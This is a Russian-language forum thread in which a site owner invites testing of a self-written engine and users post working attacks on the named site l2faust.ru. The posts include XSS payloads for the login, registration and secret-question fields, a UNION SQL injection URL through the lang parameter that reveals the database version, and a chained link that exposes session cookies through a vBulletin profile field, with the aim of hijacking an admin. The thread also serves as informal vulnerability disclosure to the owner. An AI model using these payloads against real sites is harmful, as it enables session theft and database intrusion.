проверьте двиг. самописное. у кого замечания не по теме - пишем ПМ.

XSS
Уязвимо поле Логин или вот так http://l2faust.ru/acc/index.php?do=retry&login="><script>alert()</script>

Не только логин ..

// Мда, ну и нахрена была постить полуметровый скриншот, если можно просто написать, что и поле "Секретный вопрос" так же уязвимо?
BlackSun.

http://l2faust.ru/index.php?lang=ru%60+from+%60newstbl%60+union+sele ct+1,2,version()/*&act=news
MySql-inj
Сначала lang пишеться в сессию... потом учавствует в выборке.
Version():5.0.45-log
--------------------------------------------------
Регистрация->все поля не фильтруються(пост пассивки)
Поле секретного вопроса даст активку при востановлении пассворда..

http://l2faust.ru/acc/index.php?do=register

при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта :) XSS

http://l2faust.ru/acc/index.php?do=register

при регистрации во все поля добавить "><script>alert()</script> и нажать регистрация!!! И мы увидим 4 алерта :) XSS
второй пост этой темы почитай.
Ребят, умнички.
ща пофиксим и неплохо было бы перепроверить;)

XSS
В пост запросе http://l2faust.ru/acc/index.php
Поля: regLogin, regAnswer, regQuestion, regEmail
Подставляем 1"+onmouseover=alert(12345)+

Так же в купе с уязвимостью vBulletin, публичной (поле веб адреса пользователя не фильтруется) и фиксацией сессии, конструируем типа такой ссылки:
http://l2faust.ru/acc/index.php?do=register&regLogin=1"+onmouseover=alert(document.cookie)+ и вставляем в своем профиле на форуме, теперь при нажатии получаем куки, собственно если постараться то возможно и админа можно заполучить :)

ок спасибо. ребят, спасибо, но давайте так. впредь перед тем, как юзать експлойты - вы меня предупреждайте, чтобы я хостера предупредил, а то они чуть не забанили подсеть с которой была атака.